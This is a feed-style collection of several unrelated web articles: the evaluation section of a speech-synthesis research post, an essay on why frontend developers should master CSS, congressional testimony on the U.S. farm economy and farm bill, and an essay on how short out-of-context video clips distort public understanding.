    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43227881 Sun, 02 Mar 2025 06:13:01 GMT
    <![CDATA[Knowing CSS is mastery to front end development]]> thread link) | @tipiirai
    March 1, 2025 | https://helloanselm.com/writings/knowing-css-is-mastery-to-frontend-development | archive.org

    There are countless articles on why developers should not focus too much on frameworks and should instead learn to understand the underlying languages. But we rarely find good reasons beyond the fact that frameworks come and go. To me, the main reason is different: you won’t be a master of frontend development if you don’t understand the underlying mechanisms of a language.

    A typical stack today is React together with countless layers between the language and the framework itself. CSS is not written natively but via JavaScript tools that translate it into native CSS. For JavaScript, we nowadays write an opinionated framework-language mix in TypeScript, which is itself translated back to native JavaScript in the end. And while we all know the comfort of these tools and languages, many things become easier if you understand the browser’s ecosystem:

    • Debug JavaScript errors more easily, even in foreign environments without a debugging browser extension installed
    • Debug CSS
    • Write custom CSS (and every project I’ve seen so far needs it somewhere)
    • Understand why errors occur that you cannot reproduce locally and only see in clients’ browsers

    In the past years I have had various situations where TypeScript developers (as they called themselves) approached me and asked whether I could help them out with CSS. I expected to solve a complex problem, but for me — knowing CSS very well — it was always a simple, straightforward solution or code snippet:

    • A multi-colored footer bar should not be an image; it’s a simple multi-step CSS background gradient in one line of code (see the sketch after this list). No need to scale an image or create an SVG, just CSS.
    • Custom icons for an input field? Welp, for privacy reasons it’s not that easy to add a pseudo-class here in certain cases. But there are many simple solutions, and no need to include another bloated npm dependency that nobody understands.
    • Webfonts: Dev: We can’t add another webfont style, we already serve 4MB of webfonts.
      → Me: Alright, why don’t we serve it as a Variable Font?
      → Dev: Oh, what’s this?
      → Me: Check it out, we now load 218KB async, in only one file, with all the styles we have and will ever need inside.
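
    To make the footer-bar item above concrete, here is a minimal sketch of such a multi-step gradient (the selector, sizing, and colors are illustrative, not from the original exchange):

    /* Four hard-edged color bands in one background declaration: no image, no SVG. */
    .footer-bar {
      height: 6px;
      background: linear-gradient(
        to right,
        #e63946 0 25%,
        #f4a261 25% 50%,
        #2a9d8f 50% 75%,
        #264653 75% 100%
      );
    }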

    Nowadays people can write great React and TypeScript code. Most of the time a component library like MUI, Tailwind or similar is used for styling. However, nearly no one is able to judge whether the CSS in the codebase is good or far from optimal. It is magically applied to the HTML by our toolchain, and we struggle to understand why the website is getting slower and slower.

    Most of the performance basics I learned ten years ago are still the most relevant ones today. Yet most developers don’t know about them because we use create-react-app or similar things. Put Cloudflare on top to boost performance and reduce costs. Yes, that works for your personal website and little side project.

    What companies expect when they ask for a web dashboard serving real-time data to their customers is different: it should be a robust, well-working application that is easy to maintain. That means we need to combine the developer experience (React, TypeScript, all the little helpers) with knowledge of how browsers and networks work. Only then can we boost performance, write accessible code, load dynamic data in a proper and safe way, and provide fallbacks in case something goes wrong.

    In emergencies like a service incident, I’ve seen the difference often enough between people who know exactly where to look, start debugging, and work onward from there, and those who panic trying to figure out what is going on, hoping that a restart or a re-deployment with reinstalled dependencies will bring the service back to life.

    And that means, in the end: if you know CSS, you also know the style framework. If you understand JavaScript, TypeScript is not a big problem for you. And that makes you a Senior or Principal.

    ]]>
    https://helloanselm.com/writings/knowing-css-is-mastery-to-frontend-development hacker-news-small-sites-43227303 Sun, 02 Mar 2025 04:32:06 GMT
    <![CDATA[Examining the Economic Crisis in Farm Country]]> thread link) | @toomuchtodo
    March 1, 2025 | https://www.terrainag.com/insights/examining-the-economic-crisis-in-farm-country/ | archive.org

    Chairman Thompson, Ranking Member Craig, and Members of the Committee, thank you for inviting me to testify before you today.

    My name is John Newton, and I am the Executive Head of Terrain. I am honored to appear before the Committee to provide insights on factors contributing to the health of the U.S. farm economy. Terrain is tasked with researching agriculture, food, risk management and macroeconomic areas for our partnering Farm Credit associations, which are AgCountry Farm Credit Services, American AgCredit, Farm Credit Services of America, and Frontier Farm Credit. The service areas of these Farm Credit associations span from Iowa, North Dakota and Wisconsin to New Mexico, California and Hawaii, with many states between.

    I hold a Ph.D. in agricultural and applied economics from The Ohio State University and have over two decades of experience in economic and policy analysis and development. I recently served as Chief Economist on the U.S. Senate Committee on Agriculture, Nutrition, and Forestry for Senator Boozman of Arkansas. Before that, I was the Chief Economist for the American Farm Bureau Federation, an organization representing nearly 6 million family and farm members on Capitol Hill.

    Thankfully, due to the foresight of leaders of this Committee, as well as your colleagues in the Senate, the ad hoc assistance provided in the American Relief Act of 2025 will bring much-needed relief to farmers who have experienced multiple years of declining revenues and farm income, as well as those who have faced catastrophic natural disasters on their farm. However, since the high-income environment of 2022, we have seen a tale of two farm economies: Crop producers have experienced significant challenges due to low prices and high inputs, while some livestock producers have benefited from high cattle and milk prices, helping to offset elevated input costs.

    For example, since 2022, inflation-adjusted net cash farm income for corn and soybean farmers has dropped by 45% to its lowest levels in a decade and a half. Meanwhile record cattle prices have contributed to higher levels of income since 2022, providing an opportunity for those farmers and ranchers to finally rebuild their balance sheets from the pandemic-era lows.

    Chart - A Tale of Two Farm Economies

    Farm Economic Conditions

    The flagship measurement of the overall health of the U.S. farm economy is the USDA’s net farm income, which measures the difference between total gross farm income and total production expenses and is a broad measure of the financial conditions across the U.S. farm sector.1

    Driven by record agricultural export sales, increased domestic demand, and pandemic-related federal support, inflation-adjusted net farm income reached a record high in 2022 at $198 billion. The rise in farm income, however, coincided with historic inflation as post-pandemic supply chain disruptions and reduced labor availability drove up costs across all sectors of the U.S. economy. For food- and energy-related products, Russia’s invasion of Ukraine further reduced global stockpiles of critical grains and oilseeds; disrupted global trade flows; and drove food, energy and fertilizer prices to record highs.

    Nominal farm production expenses reached a record of $462 billion in 2022 and remain near those historically high levels as input costs have not eased for farm families across the country. For example, crop production costs are projected to be higher this year for seed, chemicals, custom work, repairs, maintenance and taxes, while lower costs are projected for fertilizers, energy and interest.

    With input costs slow to decline, pressure has been mounting for three consecutive years across the farm economy — specifically for crop and specialty crop farmers. Many farmers have worked through their working capital and are now faced with tough decisions on how to reduce expenses without giving up hard-earned access to land or compromising productivity. The reality on the ground is that between 2022 and 2025, and driven by lower crop prices and elevated input costs, the USDA’s Farm Sector Income Forecast shows that:

    • Since 2022, and excluding government payments to agriculture, U.S. inflation-adjusted net farm income has fallen by $43 billion or 26%. U.S. net farm income (excluding government support) is projected at $138 billion in 2025, up slightly from 2024 when adjusted for inflation.
    • When including the ad hoc federal support provided by members of this Committee and your colleagues in the Senate during the last Congress, alongside traditional government support from commodity and conservation programs, U.S. inflation-adjusted net farm income is projected at $180 billion, up 26% from last year.
    Chart - Ad Hoc Aid to Lift Farm Economy in 2025

    The USDA’s Farm Sector Income Forecast shows that U.S. crop farmers have experienced three consecutive years of declining cash receipts, falling from an inflation-adjusted value of $307 billion in 2022 to $240 billion in 2025 — a decline of $67 billion, or 22%. For many farmers — and depending on their management, marketing, land ownership and risk management decisions — margins may have been tight, or returns may have been below breakeven, for several years because of inflation in farm production expenses and lower farm-gate prices.

    Inflation-adjusted cash receipts for livestock have fallen $7 billion since 2022 and those producers continue to face new challenges. Input costs remain elevated, and goals to capitalize on higher cattle or milk prices face headwinds due to issues with drought conditions, low inventory levels, and rising animal disease risks. Despite these challenges, for some, cash receipts for livestock, dairy, and poultry farmers have remained stable, preventing a much wider economic crisis in farm country.

    Crop Farm Prices, Input Costs and Margins for 2025

    Last year, the USDA provided an early release of supply, demand and price projections to 2034 for select commodities.2 Terrain analysis of the data revealed that for the upcoming 2025/26 crop year (that is, the crop that farmers will plant this spring), the national marketing year average corn price is projected at $3.90/bushel (bu.), down 40% from the recent high of $6.54/bu. Soybean prices are projected at $10/bu., down 30% from two years ago. All major crops except wheat are expected to see lower or flat prices for the upcoming crop year. This upcoming crop year, wheat prices are projected to climb to $5.80/bu., yet wheat prices will remain 34% lower than the price farmers received just a few short years ago.3

    As I have indicated, input costs have been slow to adjust, and this spring the cost of production for major field crops is expected to remain elevated.4 Crop input costs this year are expected to be the highest for rice at more than $1,300/acre (ac.). Next come peanuts, then cotton. For cotton, the cost of production is forecast at $900/ac. The cost to produce an acre of corn is projected at $871/ac., and for soybeans the projected cost of production is $625/ac. To put these costs into perspective, according to the USDA Census of Agriculture, the average-sized corn farm in the U.S. is 279 acres, which equates to nearly $250,000 in total costs to plant a crop, with no guarantee that Mother Nature will do her part.5

    Given these high input costs and expectations for crop prices to mostly move lower again in 2025, it is no surprise that another year of margins at or below breakeven is on the horizon. Even the University of Illinois’ 2025 Crop Budgets confirm crop prices and revenues will be below breakeven for high-productivity farmland in Central Illinois.6 The most recent crop market outlook from the Agricultural and Food Policy Center at Texas A&M University reveals that many farms in each of their four commodity types (feed grains, cotton, rice and wheat) are not expected to have a positive cash flow over the next five years and there is no crop rotation that yields a positive return.7

    Based on Terrain's analysis of current price and yield expectations, for the 2025/26 marketing year, the revenue shortfall is expected to be the largest for cotton at $339, or 38% below breakeven. Other crops such as grain sorghum are projected at $174, or 40% below breakeven, and corn at $161, or 19% below breakeven. Importantly, for every major U.S. field crop, the projected revenue in 2025 is below the projected cost of production, marking the third year in a row of low or negative economic returns, on average, for crop farm families.

    Chart - Margins Expected to Remain Tight in 2025

    The Impact of Bridge Economic Assistance for Farmers

    In response to this historic and ongoing decline in the farm economy, and through the foresight of leaders of this Committee, the American Relief Act of 2025 provided the USDA with nearly $10 billion to deliver ad hoc financial assistance to crop farmers experiencing economic disasters as well as more than $20 billion to help farmers recover from catastrophic natural disasters such as hurricanes, wildfires and drought.8 According to the American Farm Bureau Federation, in recent years, catastrophic natural disasters have resulted in agriculture-related losses in the tens of billions of dollars.9

    Terrain's analysis indicates that for major crops such as corn, soybeans, wheat, sorghum, oats and cotton, the estimated economic assistance payments (excluding payments related to natural disasters) offset only a portion of a crop farm's negative margin.10 Terrain’s estimates further indicate that these economic assistance payments could range from a high of $87/ac. for cotton to a low of $29/ac. for soybeans, and nationally will average approximately $38/ac. Unfortunately, in no case do these program payments bring farm cash flow levels even close to breakeven.

    U.S. Map - What Will Farmers in Each State Receive?

    These economic assistance payments are only a bridge until a new five-year farm bill can be authorized by Congress. These dollars are much needed as farmers prepare for the upcoming growing season. However, while these one-time payments will help to improve working capital, based on crop price and yield projections from the January 2025 World Agricultural Supply and Demand Estimates, many farmers are still projected to experience tight or negative margins after accounting for the economic assistance payments, amplifying the need for a new five-year farm bill with enhanced risk management tools.11

    Chart - Tight Margins and American Relief Act Payments

    Agricultural Trade and the Farm Economy

    In the years preceding the high-farm-income environment, several new trade agreements were negotiated and agreed upon with countries around the world that impacted the economic success of U.S. agriculture. These included the Economic and Trade Agreement Between the United States of America and the People’s Republic of China, the United States-Mexico-Canada Agreement, and the U.S.-Japan Trade Agreement.12,13,14

    By fiscal year (FY) 2022, the value of U.S. agricultural exports had reached a record high of $196 billion and contributed to the financial success of many farm families across the country.15 While food and agricultural imports were also on the rise, the U.S. agricultural industry remained largely a positive contributor to the U.S. trade balance with the rest of the world — a position that U.S. agriculture had held, until only recently, for the better part of five decades.

    Now, in FY25, the U.S. agricultural trade deficit is projected to be the largest in history at nearly $46 billion, according to the USDA’s Economic Research Service. While the value of the dollar, demand for year-round access to fruits and vegetables, and demand for imported alcoholic beverages contribute to record food and agricultural imports, the value of U.S. exports has fallen sharply — projected at $170 billion in FY25 and down $26 billion from FY22’s record.16

    Chart - U.S. Agricultural Trade and Trade Balance

    The ripple effect of slower U.S. agricultural exports hits the farm economy, farm families and rural Main Street, and is a large contributor to the decline in crop cash receipts and overall net farm income since 2022.

    To reverse the record-large trade deficit in agriculture, a priority should be placed on finding and developing new markets for U.S. agriculture, reducing non-tariff barriers to trade, accelerating the adoption of science-based production practices, and improving existing market access in the major economies with which U.S. agriculture does business and those we desire to do business with.

    To assist in export market access and development, the USDA allocated $174 million through the Market Access Program (MAP) and $27 million through the Foreign Market Development Program (FMD) to collaborating organizations in FY24, but more can be done. The Farm, Food, and National Security Act of 2024, passed out of Committee in the 118th Congress, would have doubled funding for MAP/FMD — providing increased opportunities for farmers, ranchers and their collaborating organizations to close the gap in our agricultural trade deficit in the years to come.17

    Under the current administration, tariffs are either in effect or under consideration in major U.S. agricultural export markets. Although none of these markets has enacted retaliatory measures directly affecting U.S. agriculture or farmers and ranchers, it is crucial to closely monitor the economic implications of these tariffs on farm-level income, supply chains, and the consumption of food and agricultural products. This evaluation will be essential if Congress ultimately needs to contemplate market interventions or ad hoc support measures to protect farmers and their rural communities from retaliation.

    Enhanced Risk Management Is Critical in Farm Country

    Farm Credit has been a partner with the USDA for decades in the delivery of federal crop insurance to our nation’s farmers and ranchers. Since 2014, the USDA’s Risk Management Agency has worked with the industry to make over 300 crop insurance modifications, including the introduction of new policies through the 508(h)-development process to manage new risks. Notable developments include:

    • New policies to manage the risk of rising input costs on farm margins
    • New area-based plans of insurance with higher levels of coverage
    • Expanded options for livestock producers such as Dairy Revenue Protection (Dairy-RP)
    • Higher premium cost-sharing for cattle and hog farmers

    Through various modifications and enhancements, Farm Credit aims to provide the necessary tools and insights, including those offered by Terrain, to assist farmers in managing the risk associated with price declines or crop losses through crop insurance. Several Farm Credit associations have invested in new technologies to help crop and livestock farmers make informed crop insurance decisions. For example, Optimum uses a simulation process that combines prices, yields, and federal crop insurance policy frameworks to determine how different combinations of crop insurance products can perform in helping farmers manage their risk. Through Optimum, farmers can better take advantage of market opportunities before the growing season to maximize revenue and reduce risk, providing them the financial security to better market their crop during the growing season.

    Even with all the opportunities and tools the federal crop insurance program and Farm Credit provide, my research suggests that the most common crop insurance policies for managing risk will not cover breakeven expenses for most crop farmers in 2025. For example, using county-level non-irrigated yield information from the USDA’s Risk Management Agency, Chicago Mercantile Exchange settlement price for new-crop corn of $4.60/bu., and the most common crop insurance policy purchased in each county, crop insurance guarantees cover 70% of USDA Economic Research Service production costs in just over 60% of corn-producing counties. In about one-fourth of these counties, insurance guarantees cover only 50% of the USDA's estimated production costs.

    Endorsements like the Enhanced Coverage Option, created at the direct request of growers, enable farmers to buy higher coverage levels. The USDA's recent premium cost-share improvements make it a viable risk management option. However, in 2024, slightly more than 15 million acres were insured across 30 crops. Increasing education and awareness of these endorsements and changes to these endorsements — alongside other improvements in policy options such as Agriculture Risk Coverage (ARC) or Price Loss Coverage (PLC) — will help farmers collaborate with their insurance agents and other stakeholders to create effective risk management strategies for their farm operation.

    U.S. Map - Insurance Coverage May Fall Short of Input Costs

    State of the Dairy Industry

    Dairy is one of the largest portfolios financed by our partner Farm Credit associations, prompting us to closely monitor the health of the dairy economy. The number of dairy farms in the U.S. has declined significantly. According to the most recent Agricultural Censuses, farm numbers decreased from 39,303 in 2017 to 24,082 in 2022.18 Although the total number of milk cows also fell, it was a less pronounced decline, from 9.5 million to 9.3 million head, underscoring the rapid consolidation within the industry.

    Dairy profitability has been highly uncertain due to the volatility of managing milk and feed prices alongside rising input costs beyond feed. Dairy Margin Coverage (DMC) margins, which serve as an overall indicator of U.S. dairy farm profitability, have fluctuated dramatically, ranging from an all-time low of $3.52/hundredweight (cwt) to an all-time high of $15.57/cwt within 15 months from July 2023 to September 2024.19

    In addition to market-driven volatility, U.S. dairy producers faced an outbreak of Highly Pathogenic Avian Influenza (HPAI) in 2024 that has persisted into 2025. Affected milking herds can experience a significant reduction in milk production, ranging from 20% to 30% during the primary month of infection, with minor reductions continuing in the following months. Since March 2024, there have been 937 confirmed cases in 16 states. Notably, California — the top milk-producing state in the country — has reported 720 cases and experienced state-level milk production declines in both November and December 2024, resulting in a shortfall of hundreds of millions of pounds of milk.

    The impact of animal diseases, geopolitical risks, and fluctuations in supply and demand ultimately affects the mailbox milk price checks that dairy farmers receive. With livestock insurance covering slightly more than a quarter of the U.S. milk supply, there is an ongoing need for increased education and awareness regarding the availability and affordability of risk management tools such as Dairy-RP and Livestock Gross Margin insurance.

    State of the Beef Cattle Industry

    Alongside dairy and row crop portfolios, financing for beef cattle production makes up another large share of the portfolio of our partnering Farm Credit associations. There are various segments of the beef cattle industry that we monitor closely, including cow-calf producers, stocker/backgrounder operations, feed yards and processing.

    Drought conditions, the early pandemic-era financial pressures felt across many segments of the beef cattle supply chain, and the ongoing decline in the cattle numbers have contributed to a substantial decline in the number of farms with beef cows. Over the last five years alone, feeder and fed cattle prices have rallied from cycle lows to record highs. Simultaneously, beef cow and feeder cattle and calf inventories have continued to decline to more than 60-year lows. As reported in the USDA’s recent cattle inventory report, beef cow numbers, as of January 1, 2025, total 27.9 million head. This is down 0.5%, or 150,000 head, versus a year earlier. Compared with the most recent cycle peak that occurred in 2019, beef cow inventories are down 3.8 million head, which represents a decline of 12%. The report also revealed that cow-calf operations retained and bred 2% fewer beef replacement heifers during 2024 and retained about 1% fewer heifer calves to grow and breed during 2025. This will make it extremely difficult for any herd rebuilding to occur before 2027.20

    Even though most beef cow-calf operations have returned to profitability during this contraction phase of the cattle cycle, escalating costs have kept record prices from returning record profits. According to the USDA’s Economic Research Service Estimated Costs and Returns for Cow-Calf Producers, the total cost of production reached a record high of $1,729/head in 2024, while the average returns over variable operating costs are approximately half of what returns were a decade ago when cattle prices reached similar levels.21

    Emerging forecasts for a return to drought conditions across much of the major cow-calf production areas, high operating costs, higher interest rates due to inflation, and advancing average producer age are holding most cow-calf producers back from thinking of breeding herd expansion. Many operations are using the opportunity of high prices and relatively higher revenues to deleverage their financial position and improve balance sheets. A return to profitability and a positive outlook for continued high calf prices has most cattle producers evaluating the multiple factors that could make or break their successful herd rebuilding.22 The reduction in beef cow and beef replacement heifer numbers that occurred during 2024 and was confirmed in the cattle inventory report suggests the beef cow herd may only stabilize during 2025 and 2026. The current rally in prices for all classes of cattle and beef has been driven by a simultaneous decline in cattle numbers and continued year-over-year increases in beef demand. Cattle and beef producers’ focus on consumer tastes and preferences and delivering a consistent improvement in beef quality has been a winning strategy.

    Current cattle price cycle lows for feeder and fed cattle occurred in April 2020, during the onset of the COVID-19 pandemic. Now, less than five years later, feeder and fed cattle prices are setting record highs. Since setting their lows, feeder cattle prices are up 142% ($117/cwt to $277/cwt) and fed cattle prices have rallied 121% ($95/cwt to $210/cwt).

    Improved grazing opportunities and declining feed grain prices resulted in modest profitability for the margin-driven stocker and feed yard cattle operations that grow cattle they have purchased from other cattle producer segments. However, the record-high prices they paid for replacement cattle during the fall and winter of 2024 — when the number of available cattle was historically low — may yield financial losses during the second half of 2025 when they sell those animals.

    The record value of the inventory on cattle operations has underscored the continued and growing need for functional and efficient risk management tools for operations of all sizes. Producers’ access to tools like Livestock Risk Protection (LRP) and Livestock Gross Margin (LGM) plans is increasingly important, as they serve backgrounding and feed yard operations well. Recent enhancements to the programs will make them even better tools for farmers and ranchers. Some cow-calf operations are participating in LRP but have additional exposure to weather, which drives poor ranch-level reproduction and reduced calf growth. The Weaned Calf Risk Protection pilot program could be a valuable tool for ranchers and farmers, but ongoing education on program functionality is needed to enhance adoption.

    Specialty Crop and Wine Grape Challenges in California

    Specialty crop production in California has faced significant challenges since the onset of the COVID-19 pandemic. While some crops have fared better than others, most have experienced either a rapid increase in costs, a sharp decrease in prices, or both. These developments have compounded existing challenges in the state's agriculture sector, such as rising regulatory compliance costs and the Sustainable Groundwater Management Act (SGMA), which restricts groundwater pumping and leads to the repurposing of many acres of production.

    Tree nuts, a major portfolio of our partner Farm Credit associations, have been hit particularly hard. The pandemic disrupted global shipping lanes, causing inventories of almonds and walnuts to accumulate in warehouses, which put immediate downward pressure on prices. Combined with increased costs due to inflation, this resulted in the lowest profitability on record, according to Terrain research.23 This has forced many farmers to remove acreage, with bearing walnut acreage already in decline for the first time since 1999, according to the USDA. Almond bearing acreage is also expected to decline soon.

    Weather challenges and economic headwinds contributed to a smaller wine grape crop in 2024.24 U.S. wine grape growers continue to face growing risk of financial loss due to the increasing prevalence of wildfires in key West Coast growing regions. Growers suffered substantial losses in both 2017 and 2020 due to vine damage as well as the rejection of contracted fruit stemming from actual and perceived smoke taint. Many estate wineries used only a portion of their fruit or did not make wine at all, and some smoke-impacted grapes were made into bulk wine and sold at below-market prices. The estimated financial loss to California wine grape growers was over $600 million in 2020 alone. Reflecting the severe losses that occurred in the California grape industry in 2020, more than $300 million in indemnities were paid to California grape growers, a record high and a clear reason why recent developments such as the Fire Insurance Protection – Smoke Index endorsement are much needed for grape growers subject to fire risks.25

    Farm Bill Is a Five-Year Contract with Agriculture

    The Congressional Budget Office’s January 2025 baseline for mandatory farm and nutrition programs projected total farm bill spending at $1.4 trillion over 10 years.26 Of that total, approximately $300 billion is projected for mandatory USDA farm programs such as crop insurance, commodity income support programs, livestock disaster programs, conservation and working lands programs, and trade promotion programs. These critical programs are currently operating on a one-year extension through the end of FY25, with no certainty thereafter.27

    Pie Chart - January 2025 Baseline for Farm Bill Programs

    Many of the linchpin farm bill programs that farmers depend upon need modernization. Since the last five-year farm bill reauthorization in 2018, the farm bill baseline has increased by $556 billion, or 64%, with only 17% of that total driven by farm-related programs. Simultaneously, U.S. agriculture has faced down unprecedented economic challenges associated with increased catastrophic natural disasters, disruptions related to COVID-19, and increased price volatility due to geopolitical risks — challenges that traditional farm bill programs were ill-equipped to face.

    As a result, Congress has intervened on several occasions to provide ad hoc support, most recently with the American Relief Act of 2025. Since 2018, I estimate that ad hoc support to farmers and ranchers has totaled more than $132 billion, compared with slightly more than $20 billion from direct income support programs such as ARC, PLC or DMC. Ad hoc support has been more than six times higher than the support from farm bill commodity support programs. While ARC and PLC are expected to deliver higher levels of support for the 2025/26 crop year, this is temporary, as support levels will gradually decline each crop year in a low-price environment.28 For other crops like rice or peanuts, their farm bill support has not materially changed in over a decade.

    The farm bill is a five-year contract with agriculture and rural America, and it is time to update that contract with our farmers and ranchers, given the significant federal support coming from outside the farm bill. With nearly 350 million people in the U.S. (hopefully consuming three meals per day), the cost of critical farm risk management and conservation programs is less than 8 cents per meal. Ask anyone in America if they would pay 8 cents per meal to ensure a safe, abundant, sustainable and affordable food supply. The answer will be a resounding yes.

    Farm Credit is there for the farmer through the highs and the lows of the farm economy; we know firsthand that the sense of urgency is real in farm country and the opportunity to enhance the five-year contract with agriculture and rural America is now, before it is too late.

    I have spent my entire career working with farm families and deeply understand the challenges and potential opportunities that lie ahead. Actions by the Agriculture Committees and administration play a key role in the success of U.S. agriculture, our food security and our national security. Healing an ailing farm economy with a new five-year farm bill would be an important first step.

    Thank you very much for the opportunity to offer testimony before you today. I am thankful to every member of this Committee for your time and attention, and I look forward to answering any questions you may have.

    Endnotes

    27The USDA’s Federal Crop Insurance Program operates on permanent authority.

    ]]>
    https://www.terrainag.com/insights/examining-the-economic-crisis-in-farm-country/ hacker-news-small-sites-43227226 Sun, 02 Mar 2025 04:19:05 GMT
    <![CDATA[The Clip]]> thread link) | @paulorlando
    March 1, 2025 | https://unintendedconsequenc.es/the-clip/ | archive.org

    How much context is the right amount of context? When we necessarily choose a section — a clip — of a story on which to focus, how do we know we have chosen well?

    How far out do we need to zoom? Further to that, what problems are caused by our choice of the clip?

    There are differences in level of zoom. When Dan Carlin of Hardcore History first does a five-hour podcast on Rome as a prelude to eventually talking about Cleopatra, that’s an uncommonly wide-angle view, though it still summarizes years into hours. When we look at a short shareable video or an image as a way to sum up an event, that’s a view constrained by attention. There’s a time for each type of view, but media business models often prefer the quick, upsetting, and shareable.

    When it came to using a clip and interpreting intent, Cardinal Richelieu put it famously.

    “If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged.”

    Whenever I read a quote that good, I wonder if it was said at all. So I dug into it a bit — something I hadn’t done before, though I first heard that quote years ago. After all, that Richelieu quote is a clip itself. The quote, as it turns out, is first listed in The Cyclopedia of Practical Quotations by Jehiel Keeler Hoyt (p. 762).

    Those six lines mentioned, what are they? They are a snippet of one person’s thoughts that they chose to express. Edited and reinterpreted, they can mean something other than intended. A clip can represent many things and read differently to an enemy than to a friend.

    Publication date of the source of Richelieu’s quote: 1896. That’s over 250 years after Richelieu died.

    I went from being a news junkie years ago to avoiding the news today. So I’m not that familiar with Candace Owens or Ted Lieu. I know their names but couldn’t tell you the details of what they stand for.

    That’s why I was surprised when my Twitter feed was inundated one day in April with clips of their Congressional hearing exchange. Something had happened that, while maybe not newsworthy, was at least share-worthy. Again, it just seemed like too perfect an exchange. After a few days, I dug in.

    ted lieu nails gop for inviting hitler apologist candace owens to hearing on white supremacists pic.twitter.com/UPiGcSRPUQ

    — Oliver Willis (@owillis) April 9, 2019

    Candace Owens: “I think it’s pretty apparent that Mr. Lieu believes that black people are stupid and will not pursue the full clip…That was unbelievably dishonest…I’m deeply offended by the insinuation of revealing that clip without the question that was asked of me.” pic.twitter.com/UioMSZK93d

    — CSPAN (@cspan) April 9, 2019

    So which is it? Which clip do I accept? And how is it possible that there was a chosen clip on social media at all? Both of those clips are only a few minutes long combined. Why did they not appear together?

    That was something that only made sense after I checked on the hearing.

    This is the full video. It is four hours long. How many people will watch it in its entirety, rather than the clip that best represents what they want to be true?

    Those clips are interspersed within the four-hour hearing. How many people have time to sift through those four hours? So you could say the lesson of Owens – Lieu is different from that of Richelieu. Richelieu takes any clip and makes it mean anything incriminating. Owens – Lieu takes a selected clip because, without context, it sounds like something incriminating.

    Some People

    Another, but much briefer, viral video was based on part of a sentence said by another congressperson, Rep. Ilhan Omar. I’m not going to put these videos up since, unlike the other clips, they are mostly the sentence fragment plus other narrative-shaping images not necessarily related to what Omar said. But it’s interesting to look at where the attention came from.

    When Omar said “some people did something” in connection to the 9/11 attacks, she drew lots of negative attention, including the creation of that viral video. But what was the full sentence? What was the full speech?

    “CAIR was founded after 9/11 because they recognized that some people did something and that all of us were starting to lose access to our civil liberties.”

    It was a mistake for a public figure to speak carelessly about a topic like 9/11, even in the year 2019. But the number of times Omar uses the words “some,” “someone,” and “something” is interesting. I came away from reading the transcript thinking that she’s just a poor public speaker. That might have put her at greater risk of someone making the clip. Here’s the full transcript.

    The Smirk

    Another incident that spread online was “the smirk,” the way a group of high school boys was shown antagonizing a Native American man. The name “the smirk” came from the look on one boy’s face (Nick Sandmann) as he looked on.

    The main actors in this clip exchange no words. Fascinating, I think.

